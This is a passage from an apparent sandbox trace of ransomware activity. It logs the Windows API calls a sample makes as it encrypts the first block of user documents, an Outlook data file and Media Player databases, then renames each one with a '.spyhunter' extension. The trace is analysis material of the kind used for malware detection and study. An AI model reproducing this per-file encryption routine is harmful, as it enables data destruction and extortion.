lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.170] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef94*=0x2800, lpOverlapped=0x0) returned 1 [0141.170] GetProcessHeap () returned 0x2c0000 [0141.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.171] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.171] WriteFile (in: hFile=0x16c, lpBuffer=0x270efd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x270efd4*, lpNumberOfBytesWritten=0x270ef94*=0x4, lpOverlapped=0x0) returned 1 [0141.171] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef94*=0x30, lpOverlapped=0x0) returned 1 [0141.171] CloseHandle (hObject=0x16c) returned 1 [0141.171] GetProcessHeap () returned 0x2c0000 [0141.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.171] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\pTWJhKHYm8ibMuP.doc.spyhunter") returned 101 [0141.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\pTWJhKHYm8ibMuP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\ptwjhkhym8ibmup.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\pTWJhKHYm8ibMuP.doc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\ptwjhkhym8ibmup.doc.spyhunter")) returned 1 [0141.172] GetProcessHeap () returned 0x2c0000 [0141.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.172] GetProcessHeap () returned 0x2c0000 [0141.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.172] GetProcessHeap () returned 0x2c0000 [0141.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46728 | out: hHeap=0x2c0000) returned 1 [0141.172] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efd8 | out: pbBuffer=0x270efd8) returned 1 [0141.172] GetProcessHeap () returned 0x2c0000 [0141.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.172] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efd0*=0x30) returned 1 [0141.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\JIQwiwB.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\jiqwiwb.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\JIQwiwB.xls") returned 62 [0141.172] StrStrW (lpFirst="JIQwiwB.xls", lpSrch=".txt") returned 0x0 [0141.172] GetProcessHeap () returned 0x2c0000 [0141.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.172] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef94*=0x2800, lpOverlapped=0x0) returned 1 [0141.173] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.173] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef94*=0x2800, lpOverlapped=0x0) returned 1 [0141.173] GetProcessHeap () returned 0x2c0000 [0141.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.173] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.174] WriteFile (in: hFile=0x16c, lpBuffer=0x270efd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x270efd4*, lpNumberOfBytesWritten=0x270ef94*=0x4, lpOverlapped=0x0) returned 1 [0141.174] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef94*=0x30, lpOverlapped=0x0) returned 1 [0141.174] CloseHandle (hObject=0x16c) returned 1 [0141.174] GetProcessHeap () returned 0x2c0000 [0141.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.174] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\JIQwiwB.xls.spyhunter") returned 72 [0141.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\JIQwiwB.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\jiqwiwb.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\JIQwiwB.xls.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\jiqwiwb.xls.spyhunter")) returned 1 [0141.174] GetProcessHeap () returned 0x2c0000 [0141.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.174] GetProcessHeap () returned 0x2c0000 [0141.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.175] GetProcessHeap () returned 0x2c0000 [0141.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85f78 | out: hHeap=0x2c0000) returned 1 [0141.175] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efd0 | out: pbBuffer=0x270efd0) returned 1 [0141.175] GetProcessHeap () returned 0x2c0000 [0141.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.175] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efc8*=0x30) returned 1 [0141.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\j6zcQddVa.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\j6zcqddva.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\j6zcQddVa.pps") returned 64 [0141.175] StrStrW (lpFirst="j6zcQddVa.pps", lpSrch=".txt") returned 0x0 [0141.175] GetProcessHeap () returned 0x2c0000 [0141.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.175] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef8c*=0x2800, lpOverlapped=0x0) returned 1 [0141.176] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.176] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef8c*=0x2800, lpOverlapped=0x0) returned 1 [0141.176] GetProcessHeap () returned 0x2c0000 [0141.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.176] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.176] WriteFile (in: hFile=0x16c, lpBuffer=0x270efcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x270efcc*, lpNumberOfBytesWritten=0x270ef8c*=0x4, lpOverlapped=0x0) returned 1 [0141.176] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef8c*=0x30, lpOverlapped=0x0) returned 1 [0141.177] CloseHandle (hObject=0x16c) returned 1 [0141.177] GetProcessHeap () returned 0x2c0000 [0141.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.177] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\j6zcQddVa.pps.spyhunter") returned 74 [0141.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\j6zcQddVa.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\j6zcqddva.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\j6zcQddVa.pps.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\j6zcqddva.pps.spyhunter")) returned 1 [0141.177] GetProcessHeap () returned 0x2c0000 [0141.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.177] GetProcessHeap () returned 0x2c0000 [0141.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.177] GetProcessHeap () returned 0x2c0000 [0141.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5d08 | out: hHeap=0x2c0000) returned 1 [0141.178] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efd0 | out: pbBuffer=0x270efd0) returned 1 [0141.178] GetProcessHeap () returned 0x2c0000 [0141.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.178] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efc8*=0x30) returned 1 [0141.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Hhxps4mUvGb6gLRVu.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\hhxps4muvgb6glrvu.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Hhxps4mUvGb6gLRVu.pdf") returned 72 [0141.178] StrStrW (lpFirst="Hhxps4mUvGb6gLRVu.pdf", lpSrch=".txt") returned 0x0 [0141.178] GetProcessHeap () returned 0x2c0000 [0141.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.178] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef8c*=0x2800, lpOverlapped=0x0) returned 1 [0141.179] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.179] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef8c*=0x2800, lpOverlapped=0x0) returned 1 [0141.179] GetProcessHeap () returned 0x2c0000 [0141.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.179] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.179] WriteFile (in: hFile=0x16c, lpBuffer=0x270efcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x270efcc*, lpNumberOfBytesWritten=0x270ef8c*=0x4, lpOverlapped=0x0) returned 1 [0141.179] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef8c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef8c*=0x30, lpOverlapped=0x0) returned 1 [0141.179] CloseHandle (hObject=0x16c) returned 1 [0141.179] GetProcessHeap () returned 0x2c0000 [0141.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.179] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Hhxps4mUvGb6gLRVu.pdf.spyhunter") returned 82 [0141.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Hhxps4mUvGb6gLRVu.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\hhxps4muvgb6glrvu.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Hhxps4mUvGb6gLRVu.pdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\hhxps4muvgb6glrvu.pdf.spyhunter")) returned 1 [0141.180] GetProcessHeap () returned 0x2c0000 [0141.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.180] GetProcessHeap () returned 0x2c0000 [0141.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.180] GetProcessHeap () returned 0x2c0000 [0141.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5738 | out: hHeap=0x2c0000) returned 1 [0141.181] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efc8 | out: pbBuffer=0x270efc8) returned 1 [0141.181] GetProcessHeap () returned 0x2c0000 [0141.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.181] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efc0*=0x30) returned 1 [0141.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0141.182] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".txt") returned 0x0 [0141.182] GetProcessHeap () returned 0x2c0000 [0141.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.182] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef84*=0x2800, lpOverlapped=0x0) returned 1 [0141.195] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.195] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef84*=0x2800, lpOverlapped=0x0) returned 1 [0141.195] GetProcessHeap () returned 0x2c0000 [0141.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.195] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.195] WriteFile (in: hFile=0x16c, lpBuffer=0x270efc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef84, lpOverlapped=0x0 | out: lpBuffer=0x270efc4*, lpNumberOfBytesWritten=0x270ef84*=0x4, lpOverlapped=0x0) returned 1 [0141.340] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef84*=0x30, lpOverlapped=0x0) returned 1 [0141.340] CloseHandle (hObject=0x16c) returned 1 [0141.340] GetProcessHeap () returned 0x2c0000 [0141.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f98f48 [0141.340] wnsprintfW (in: pszDest=0x2f98f48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.spyhunter") returned 90 [0141.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.spyhunter")) returned 1 [0141.341] GetProcessHeap () returned 0x2c0000 [0141.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f98f48 | out: hHeap=0x2c0000) returned 1 [0141.341] GetProcessHeap () returned 0x2c0000 [0141.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.341] GetProcessHeap () returned 0x2c0000 [0141.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63f48 | out: hHeap=0x2c0000) returned 1 [0141.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efc0 | out: pbBuffer=0x270efc0) returned 1 [0141.341] GetProcessHeap () returned 0x2c0000 [0141.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efb8*=0x30) returned 1 [0141.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.342] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0141.342] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".txt") returned 0x0 [0141.342] GetProcessHeap () returned 0x2c0000 [0141.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.342] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ef7c*=0x2800, lpOverlapped=0x0) returned 1 [0141.346] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.346] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ef7c*=0x2800, lpOverlapped=0x0) returned 1 [0141.347] GetProcessHeap () returned 0x2c0000 [0141.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.347] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.347] WriteFile (in: hFile=0x16c, lpBuffer=0x270efbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x270efbc*, lpNumberOfBytesWritten=0x270ef7c*=0x4, lpOverlapped=0x0) returned 1 [0141.347] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef7c*=0x30, lpOverlapped=0x0) returned 1 [0141.347] CloseHandle (hObject=0x16c) returned 1 [0141.347] GetProcessHeap () returned 0x2c0000 [0141.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f98f48 [0141.348] wnsprintfW (in: pszDest=0x2f98f48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.spyhunter") returned 83 [0141.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.spyhunter")) returned 1 [0141.348] GetProcessHeap () returned 0x2c0000 [0141.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f98f48 | out: hHeap=0x2c0000) returned 1 [0141.348] GetProcessHeap () returned 0x2c0000 [0141.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.348] GetProcessHeap () returned 0x2c0000 [0141.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7c88 | out: hHeap=0x2c0000) returned 1 [0141.355] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efc0 | out: pbBuffer=0x270efc0) returned 1 [0141.356] GetProcessHeap () returned 0x2c0000 [0141.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efb8*=0x30) returned 1 [0141.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.356] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0141.356] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".txt") returned 0x0 [0141.356] GetProcessHeap () returned 0x2c0000 [0141.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.357] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ef7c*=0x2800, lpOverlapped=0x0) returned 1 [0141.451] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.456] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ef7c*=0x2800, lpOverlapped=0x0) returned 1 [0141.464] GetProcessHeap () returned 0x2c0000 [0141.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.524] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 